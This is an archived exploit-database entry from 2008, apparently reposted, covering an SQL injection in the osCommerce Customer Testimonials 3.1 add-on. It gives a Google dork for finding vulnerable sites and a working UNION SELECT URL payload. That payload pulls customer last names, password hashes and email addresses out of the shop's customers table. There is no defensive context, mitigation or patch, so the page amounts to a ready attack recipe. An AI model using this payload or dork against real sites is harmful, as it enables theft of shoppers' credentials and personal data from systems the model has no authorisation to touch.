osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability
# Published : 2008-02-07
# Author : it's my
# Previous Title : Mambo Component com_gallery Remote SQL Injection Vulnerability
# Next Title : Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability

#########################################################
##
##  osCommerce SQL Injection (customer_testimonials.php)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"customer_testimonials.php"
##
#########################################################
   
   Exploit:

http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################

source: http://addons.oscommerce.com/info/5477

# www.Syue.com [2008-02-07]